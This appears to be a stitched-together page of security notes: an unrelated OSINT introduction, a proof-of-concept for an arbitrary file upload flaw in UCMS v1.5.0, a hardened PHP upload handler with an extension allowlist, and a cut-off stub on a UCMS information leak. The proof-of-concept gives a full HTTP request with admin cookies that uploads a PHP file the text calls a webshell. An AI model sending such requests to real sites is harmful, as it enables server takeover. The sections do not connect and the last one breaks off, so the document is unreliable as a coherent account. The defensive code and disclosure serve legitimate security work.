
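OSINT Guide

1. Introduction

Open-source intelligence (OSINT) collection is the process of querying and consolidating publicly available data from media, the internet, official channels and other platforms into systematic intelligence. OSINT can be gathered in two ways: actively and passively. Passively collected information usually comes from third-party threat-intelligence platforms such as Shodan and Censys; its advantages are low query cost and relatively covert activity. Active collection requires direct interaction with the target and therefore carries some risk, but it can obtain fresher and more varied data. Depending on what is already known, such as a domain name, a company name, or an administrator's online handle, OSINT collection can be approached from different angles.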


UCMS v1.5.0 Arbitrary file upload vulnerability

Vulnerability type:

File upload

Vulnerability version:

1.5.0

Reproduction environment:

  • Windows 10
  • PHP 5.4.5
  • Apache 2.4.23

Vulnerability description and reproduction:

The upload bug is very simple.

The vulnerability is in the \UCMS_1.5.0\UCMS\sadmin\file.php file, which does not verify the suffix (extension) of the uploaded file. The file is passed directly to the move_uploaded_file function.

POST /ucms/index.php?do=sadmin_file&dir=/ HTTP/1.1
Host: www.ucm1.5.0.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://www.ucm1.5.0.com/ucms/index.php?do=sadmin_file
Content-Type: multipart/form-data; boundary=---------------------------117674106655
Content-Length: 333
Connection: close
Cookie: admin_a83bb0=admin; psw_a83bb0=6609024d5fb57f730314b384acb138e4; token_a83bb0=a81beeab
Upgrade-Insecure-Requests: 1

-----------------------------117674106655
Content-Disposition: form-data; name="uuu_token"

a81beeab
-----------------------------117674106655
Content-Disposition: form-data; name="uploadfile"; filename="upload_CNVD.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------117674106655--

The uploaded webshell can then be accessed in the root directory.
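The suffix check that the description above says is missing before move_uploaded_file, shown as a hardened handler. This is an added example, not code from UCMS or from the original post; it assumes PHP 7+, and the function names, allowlist and destination directory are hypothetical.

```php
<?php
// Added example (not UCMS code). Assumes PHP 7+; the function names,
// allowlist and destination directory are hypothetical.
const ALLOWED_EXT = ['jpg', 'jpeg', 'png', 'gif', 'pdf', 'txt'];

// Return the lower-cased extension if it is allowlisted, otherwise throw.
function validated_extension(string $clientName): string
{
    if (strpos($clientName, "\0") !== false) {
        throw new InvalidArgumentException('NUL byte in file name');
    }
    // Only the final suffix is considered, compared case-insensitively.
    $ext = strtolower(pathinfo(basename($clientName), PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        throw new InvalidArgumentException("extension not allowed: '$ext'");
    }
    return $ext;
}

// Validate the upload, then move it under a server-generated name.
function store_upload(array $file, string $destDir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('no valid HTTP upload');
    }
    $ext = validated_extension($file['name']);
    // The client-supplied name never reaches the filesystem; only the
    // validated extension is reused.
    $target = rtrim($destDir, '/\\') . DIRECTORY_SEPARATOR
            . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        throw new RuntimeException('could not store upload');
    }
    return $target;
}

// Constructed sample names, checked when the file is run from the CLI.
if (PHP_SAPI === 'cli') {
    foreach (['report.pdf', 'upload_CNVD.php', 'UPLOAD.PHP', 'noext'] as $n) {
        try {
            echo str_pad($n, 18), 'accepted as .', validated_extension($n), PHP_EOL;
        } catch (InvalidArgumentException $e) {
            echo str_pad($n, 18), 'rejected: ', $e->getMessage(), PHP_EOL;
        }
    }
}
```

Storing uploads in a directory the web server does not execute scripts from complements the allowlist.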

UCMS v1.4.0-7 Information leakage

A problem was found in UCMS v1.4.0-7, in line 2 of ucms/chk.php.

Vulnerability type:

Information leakage

Vulnerability version:

1.4.0-7
